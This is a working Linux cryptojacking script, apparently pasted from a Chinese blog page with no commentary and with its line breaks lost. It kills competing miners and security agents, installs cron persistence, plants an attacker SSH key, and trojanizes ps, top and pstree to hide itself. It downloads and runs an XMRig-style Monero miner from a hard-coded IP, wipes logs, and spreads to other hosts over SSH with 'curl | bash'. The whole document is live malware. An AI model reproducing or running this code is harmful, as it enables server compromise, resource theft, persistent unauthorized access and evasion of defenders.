-rf /var/tmp/1.shrm -rf /var/tmp/conf.nrm -r /var/tmp/librm -r /var/tmp/.librm -rf /opt/systemd-service.shrm -rf /opt/.systemd-service.shrm -rf /root/.systemd-service.shrm -rf /usr/share/[crypto]chattr -R -ia /usr/bin/TeamTNT/*chattr -R -ia /usr/bin/watchdogd*rm -rf /usr/bin/watchdogd*service crypto stopsystemctl stop crypto.servicesystemctl stop watchdogd service watchdogd stoprm -fr /usr/bin/TeamTNT/*chattr -iau /tmp/lokchmod +700 /tmp/lokrm -rf /tmp/loksleep 1chattr -i /tmp/kdevtmpfsiecho 1 > /tmp/kdevtmpfsichattr +i /tmp/kdevtmpfsisleep 1chattr -i /usr/lib/systemd/systemd-update-dailyecho 1 > /usr/lib/systemd/systemd-update-dailychattr +i /usr/lib/systemd/systemd-update-daily>/tmp/svcupdate>/tmp/svcguard>/etc/svcupdate>/etc/svcguard>/etc/cron.daily/logrotate>/etc/cron.hourly/0anacron>/etc/rc.d/rc.local#yum install -y Docker.io || apt-get install docker.io;docker ps | grep "pocosow" | awk '{print $1}' | xargs -I % docker kill %docker ps | grep "gakeaws" | awk '{print $1}' | xargs -I % docker kill %docker ps | grep "azulu" | awk '{print $1}' | xargs -I % docker kill %docker ps | grep "auto" | awk '{print $1}' | xargs -I % docker kill %docker ps | grep "xmr" | awk '{print $1}' | xargs -I % docker kill %docker ps | grep "mine" | awk '{print $1}' | xargs -I % docker kill %docker ps | grep "slowhttp" | awk '{print $1}' | xargs -I % docker kill %docker ps | grep "bash.shell" | awk '{print $1}' | xargs -I % docker kill %docker ps | grep "entrypoint.sh" | awk '{print $1}' | xargs -I % docker kill %docker ps | grep "/var/sbin/bash" | awk '{print $1}' | xargs -I % docker kill %docker images -a | grep "pocosow" | awk '{print $3}' | xargs -I % docker rmi -f %docker images -a | grep "gakeaws" | awk '{print $3}' | xargs -I % docker rmi -f %docker images -a | grep "buster-slim" | awk '{print $3}' | xargs -I % docker rmi -f %docker images -a | grep "hello-" | awk '{print $3}' | xargs -I % docker rmi -f %docker images -a | grep "azulu" | awk '{print $3}' | xargs -I % docker rmi -f %docker images -a | grep "registry" | awk '{print $3}' | xargs -I % docker rmi -f %docker images -a | grep "xmr" | awk '{print $3}' | xargs -I % docker rmi -f %docker images -a | grep "auto" | awk '{print $3}' | xargs -I % docker rmi -f %docker images -a | grep "mine" | awk '{print $3}' | xargs -I % docker rmi -f %docker images -a | grep "monero" | awk '{print $3}' | xargs -I % docker rmi -f %docker images -a | grep "slowhttp" | awk '{print $3}' | xargs -I % docker rmi -f %#echo SELINUX=disabled >/etc/selinux/configservice apparmor stopsystemctl disable apparmorservice aliyun.service stopsystemctl disable aliyun.serviceps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I % kill -9 %rm -rf /usr/local/aegischattr -R -ia /var/spool/cronchattr -ia /etc/crontabchattr -R -ia /etc/cron.dchattr -R -ia /var/spool/cron/crontabscrontab -rrm -rf /var/spool/cron/*rm -rf /etc/cron.d/*rm -rf /var/spool/cron/crontabsrm -rf /etc/crontab}kill_miner_prockill_sus_proc(){ps axf -o "pid"|while read prociddols -l /proc/$procid/exe | grep /tmpif [ $? -ne 1 ]thencat /proc/$procid/cmdline| grep -a -E "zzh"if [ $? -ne 0 ]thenkill -9 $procidelseecho "don't kill"fifidoneps axf -o "pid %cpu" | awk '{if($2>=40.0) print $1}' | while read prociddocat /proc/$procid/cmdline| grep -a -E "zzh"if [ $? -ne 0 ]thenkill -9 $procidelseecho "don't kill"fidone}kill_sus_procnameserver(){grep -q 1.1.1.1 /etc/resolv.conf || chattr -i /etc/resolv.conf 2>/dev/null 1>/dev/null; echo "nameserver 1.1.1.1" >> /etc/resolv.conf; chattr +i /etc/resolv.conf 2>/dev/null 1>/dev/null}nameserverfuckyou(){$(docker rm $(docker ps | grep -v grep | grep "/root/startup.sh" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)$(docker rm $(docker ps | grep -v grep | grep "widoc26117/xmr" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)$(docker rm $(docker ps | grep -v grep | grep "zbrtgwlxz" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)$(docker rm $(docker ps | grep -v grep | grep "tail -f /dev/null" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)$(docker rm $(docker ps | grep -v grep | grep "/usr/bin/supervisor…" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)$(docker rm $(docker ps | grep -v grep | grep "/app/BitLockerServi…" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)rm -f /tmp/moneroocean/xmrig 2>/dev/null 1>/dev/nullpkill -f /tmp/moneroocean/xmrig 2>/dev/null 1>/dev/nullrm -fr /tmp/moneroocean/ 2>/dev/null 1>/dev/nullkillall -9 xmrig 2>/dev/null 1>/dev/nullif [ -f /root/.tmp/xmrig ]; thenchattr -iR /root/.tmp/ 2>/dev/null 1>/dev/nulltmpxmrigfile="/root/.tmp/miner.sh"rm -f $tmpxmrigfile 2>/dev/null 1>/dev/nullpkill -f $tmpxmrigfile 2>/dev/null 1>/dev/nullkill $(pidof $tmpxmrigfile) 2>/dev/null 1>/dev/nullchmod +x $tmpxmrigfile 2>/dev/null 1>/dev/nullchattr +i $tmpxmrigfile 2>/dev/null 1>/dev/nullpkill -f $tmpxmrigfile 2>/dev/null 1>/dev/nullkill $(pidof $tmpxmrigfile) 2>/dev/null 1>/dev/nullkillall $tmpxmrigfile 2>/dev/null 1>/dev/nullchmod -x /root/.tmp/xmrig 2>/dev/null 1>/dev/nullrm -f /root/.tmp/xmrig 2>/dev/null 1>/dev/nullchattr +i /root/.tmp/xmrig 2>/dev/null 1>/dev/nullpkill -f /root/.tmp/xmrig 2>/dev/null 1>/dev/nullps ax| grep xmrig 2>/dev/null 1>/dev/nullfiKINSING1=$(ps ax | grep -v grep |grep "/var/tmp/kinsing")if [ ! -z "$KINSING1" ];thenchattr -i /var/tmp/kinsing 2>/dev/null 1>/dev/nullchmod -x /var/tmp/kinsing 2>/dev/null 1>/dev/nullpkill -f /var/tmp/kinsing 2>/dev/null 1>/dev/nullkill $(ps ax | grep -v grep | grep "/var/tmp/kinsing" | awk '{print $1}') 2>/dev/null 1>/dev/nullkill $(pidof /var/tmp/kinsing) 2>/dev/null 1>/dev/nullecho " " > /var/tmp/kinsing 2>/dev/null 1>/dev/nullrm -f /var/tmp/kinsing 2>/dev/null 1>/dev/nullecho "fuckyou" > /var/tmp/kinsingchattr +i /var/tmp/kinsing 2>/dev/null 1>/dev/nullhistory -c 2>/dev/null 1>/dev/nullfiKINSING2=$(ps ax | grep -v grep |grep "/tmp/kdevtmpfsi")if [ ! -z "$KINSING2" ];thenchattr -i /tmp/kdevtmpfsi 2>/dev/null 1>/dev/nullchmod -x /tmp/kdevtmpfsi 2>/dev/null 1>/dev/nullpkill -f /tmp/kdevtmpfsi 2>/dev/null 1>/dev/nullkill $(ps ax | grep -v grep | grep "/tmp/kdevtmpfsi" | awk '{print $1}') 2>/dev/null 1>/dev/nullkill $(pidof /tmp/kdevtmpfsi) 2>/dev/null 1>/dev/nullecho " " > /tmp/kdevtmpfsi 2>/dev/null 1>/dev/nullrm -f /tmp/kdevtmpfsi 2>/dev/null 1>/dev/nullecho "fuckyou" > /tmp/kdevtmpfsichattr +i /tmp/kdevtmpfsi 2>/dev/null 1>/dev/nullhistory -c 2>/dev/null 1>/dev/nullfi}fuckyoudownloads(){if [ -f "/usr/bin/curl" ]thenecho $1,$2http_code=`curl -I -m 50 -o /dev/null -s -w %{http_code} $1`if [ "$http_code" -eq "200" ]thencurl --connect-timeout 100 --retry 100 $1 > $2elif [ "$http_code" -eq "405" ]thencurl --connect-timeout 100 --retry 100 $1 > $2elsecurl --connect-timeout 100 --retry 100 $3 > $2fielif [ -f "/usr/bin/cd1" ]thenhttp_code=`cd1 -I -m 50 -o /dev/null -s -w %{http_code} $1`if [ "$http_code" -eq "200" ]thencd1 --connect-timeout 100 --retry 100 $1 > $2elif [ "$http_code" -eq "405" ]thencd1 --connect-timeout 100 --retry 100 $1 > $2elsecd1 --connect-timeout 100 --retry 100 $3 > $2fielif [ -f "/usr/bin/wget" ]thenwget --timeout=50 --tries=100 -O $2 $1if [ $? -ne 0 ]thenwget --timeout=100 --tries=100 -O $2 $3fielif [ -f "/usr/bin/wd1" ]thenwd1 --timeout=100 --tries=100 -O $2 $1if [ $? -eq 0 ]thenwd1 --timeout=100 --tries=100 -O $2 $3fifi}unlock_cron(){chattr -R -ia /var/spool/cronchattr -ia /etc/crontabchattr -R -ia /var/spool/cron/crontabschattr -R -ia /etc/cron.d}lock_cron(){chattr -R +ia /var/spool/cronchattr +ia /etc/crontabchattr -R +ia /var/spool/cron/crontabschattr -R +ia /etc/cron.d}if [ -f "$rtdir" ]thenecho "i am root"mkdir -p /root/.sshecho "goto 1" >> /etc/zzhschattr -ia /etc/zzh*chattr -ia /etc/newinit.sh*chattr -ia /root/.ssh/authorized_keys*chattr -R -ia /root/.sshif [ -f "/bin/ps.original" ]thenecho "/bin/ps changed"elsemv /bin/ps /bin/ps.originalecho "#! /bin/bash">>/bin/psecho "ps.original $@ | grep -v "zzh|pnscan"">>/bin/pschmod +x /bin/pstouch -d 20160825 /bin/psecho "/bin/ps changing"fiif [ -f "/bin/top.original" ]thenecho "/bin/top changed"elsemv /bin/top /bin/top.originalecho "#! /bin/bash">>/bin/topecho "top.original $@ | grep -v "zzh|pnscan"">>/bin/topchmod +x /bin/toptouch -d 20160825 /bin/topecho "/bin/top changing"fiif [ -f "/bin/pstree.original" ]thenecho "/bin/pstree changed"elsemv /bin/pstree /bin/pstree.originalecho "#! /bin/bash">>/bin/pstreeecho "pstree.original $@ | grep -v "zzh|pnscan"">>/bin/pstreechmod +x /bin/pstreetouch -d 20160825 /bin/pstreeecho "/bin/pstree changing"fiif [ -f "/bin/chattr" ]thenchattrsize=`ls -l /bin/chattr | awk '{ print $5 }'`if [ "$chattrsize" -lt "$chattr_size" ]thenyum -y remove e2fsprogsyum -y install e2fsprogselseecho "no need install chattr"fielseyum -y remove e2fsprogsyum -y install e2fsprogsfiunlock_cronrm -f ${crondir}rm -f /etc/cron.d/zzhrm -f /etc/crontabecho "*/30 * * * * sh /etc/newinit.sh >/dev/null 2>&1" >> ${crondir}echo "*/40 * * * * root sh /etc/newinit.sh >/dev/null 2>&1" >> /etc/cron.d/zzhecho "0 1 * * * root sh /etc/newinit.sh >/dev/null 2>&1" >> /etc/crontabecho crontab createdlock_cronchmod 700 /root/.ssh/echo >> /root/.ssh/authorized_keyschmod 600 /root/.ssh/authorized_keysecho "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC3QgqCevA1UIX9jkWJNzaDHmCFQMCVn6DlhT8Tj1CcBLouOPpuBVqGoZem9UT/sdy563H+e1cQD6LRA9lgyBO8VBOuyjlPf/rdYeXZRv9eFZ4ROGCOX/dvNzV9XdEyPX+znEL4AS45ko0obSqNGbserHPcKtXBjjcf9zWtRvBA4lteyXENWeCST61OhVI0K7bNTUHsQhFC0rgiGFqVv+kIwMVauMxeNd5PjsES4C5P9G8Ynligmdxp7LdOFeb5/V/iO8eceQsxLyXVCe2Jue5gaaOIbKy2j2HPxj6qK2BUqlx+dJdat6HE2HyPWDKD5jPyA5Rcss1zphe7BQjH20cX1nyzbhxNNQncs5BfB0kk2Qcb9IS/ofX9p8zIVKLUHMUNC9mKqPljzxH/3wYnOZrgebS4uwfyad+6SQ1oRfs1vWotXxSz1hBjhRPpUqzA7J865AcSOZBaoRsRKZ1BaGMyJyjIfkecFgeDpmbHzOzCjIXAeh20S2wLYZGdrhgVEr0= uc1" > /root/.ssh/authorized_keyscd1 http://195.242.111.238/cleanfda/call.txtwget -q -O- http://195.242.111.238/cleanfda/call.txtfile="/etc/zzh"if [ -f "/etc/zzh" ]thenfilesize1=`ls -l /etc/zzh | awk '{ print $5 }'`if [ "$filesize1" -ne "$miner_size" ]thenpkill -f zzhrm /etc/zzhdownloads $miner_url /etc/zzh $miner_url_backupelseecho "not need download"fielsedownloads $miner_url /etc/zzh $miner_url_backupfidownloads $sh_url /etc/newinit.sh $sh_url_backupchmod 777 /etc/zzhif [ -f "/bin/ps.original" ]thenps.original -fe|grep zzh |grep -v grepelseps -fe|grep zzh |grep -v grepfiif [ $? -ne 0 ]thencd /etcecho "not root runing"sleep 5s./zzh --log-file=/etc/etc --keepalive --no-color --cpu-priority 5 -o dev.fugglesoft.me:5443 --tls --nicehash --coin monero -o 80.211.206.105:9000 -u 88MjAGcUuFzRM2AaUK1qoj9uTp9VBaFzDDUARzmTZL1XUU3DVVkAtxUUb5sHtFMisnSy5dSLQHfUBVdEVgwuwXm5E7LzQ4z.22 --tls --coin monero -o opn.en2an.top:5443 --tls --nicehash --coin monero --background &elseecho "root runing....."fichmod 777 /etc/zzhchattr +ia /etc/zzhchmod 777 /etc/newinit.shchattr +ia /etc/newinit.shchmod 600 /root/.ssh/authorized_keyschattr +ia /root/.ssh/authorized_keyselseecho "goto 1" > /tmp/zzhschattr -ia /tmp/zzh*chattr -ia /tmp/newinit.sh*if [ ! -f "/usr/bin/crontab" ]thenunlock_cronecho "*/30 * * * * sh /tmp/newinit.sh >/dev/null 2>&1" >> ${crondir}lock_cronelseunlock_cron[[ $cont =~ "newinit.sh" ]] || (crontab -l ; echo "*/30 * * * * sh /tmp/newinit.sh >/dev/null 2>&1") | crontab -lock_cronfiif [ -f "/tmp/zzh" ]thenfilesize1=`ls -l /tmp/zzh | awk '{ print $5 }'`if [ "$filesize1" -ne "$miner_size" ]thenpkill -f zzhrm /tmp/zzhdownloads $miner_url /tmp/zzh $miner_url_backupelseecho "no need download"fielsedownloads $miner_url /tmp/zzh $miner_url_backupfiecho "i am here"downloads $sh_url /tmp/newinit.sh $sh_url_backupps -fe|grep zzh |grep -v grepif [ $? -ne 0 ]thenecho "not tmp runing"cd /tmpchmod 777 zzhsleep 5s./zzh --log-file=/tmp/tmp --keepalive --no-color --cpu-priority 5 -o dev.fugglesoft.me:5443 --tls --nicehash --coin monero -o 80.211.206.105:9000 -u 88MjAGcUuFzRM2AaUK1qoj9uTp9VBaFzDDUARzmTZL1XUU3DVVkAtxUUb5sHtFMisnSy5dSLQHfUBVdEVgwuwXm5E7LzQ4z.22 --tls --coin monero -o opn.en2an.top:5443 --tls --nicehash --coin monero --background &elseecho "tmp runing....."fichmod 777 /tmp/zzhchattr +i /tmp/zzhchmod 777 /tmp/newinit.shchattr +i /tmp/newinit.shfiiptables -Fiptables -Xiptables -A OUTPUT -p tcp --dport 5555 -j DROPiptables -A OUTPUT -p tcp --dport 7777 -j DROPiptables -A OUTPUT -p tcp --dport 9999 -j DROPiptables -A OUTPUT -p tcp --dport 9999 -j DROPiptables -A OUTPUT -p tcp --dport 10008 -j DROPservice iptables reloadhistory -cecho > /var/spool/mail/rootecho > /var/log/wtmpecho > /var/log/secureecho > /root/.bash_historychmod 444 /usr/bin/chattrchmod 444 /bin/chattryum install -y bash 2>/dev/nullapt install -y bash 2>/dev/nullapt-get install -y bash 2>/dev/nullif [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; thenfor h in $(grep -oE "b([0-9]{1,3}.){3}[0-9]{1,3}b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'curl -o-http://195.242.111.238/cleanfda/init.sh | bash >/dev/null 2>&1 &' & donefiif [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; thenfor h in $(grep -oE "b([0-9]{1,3}.){3}[0-9]{1,3}b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'cd1 -o-http://195.242.111.238/cleanfda/init.sh | bash >/dev/null 2>&1 &' & donefiecho "$bbdir"echo "$bbdira"$bbdir -fsSL http://195.242.111.238/cleanfda/is.sh | bash$bbdira -fsSL http://195.242.111.238/cleanfda/is.sh | bash复制代码


推荐阅读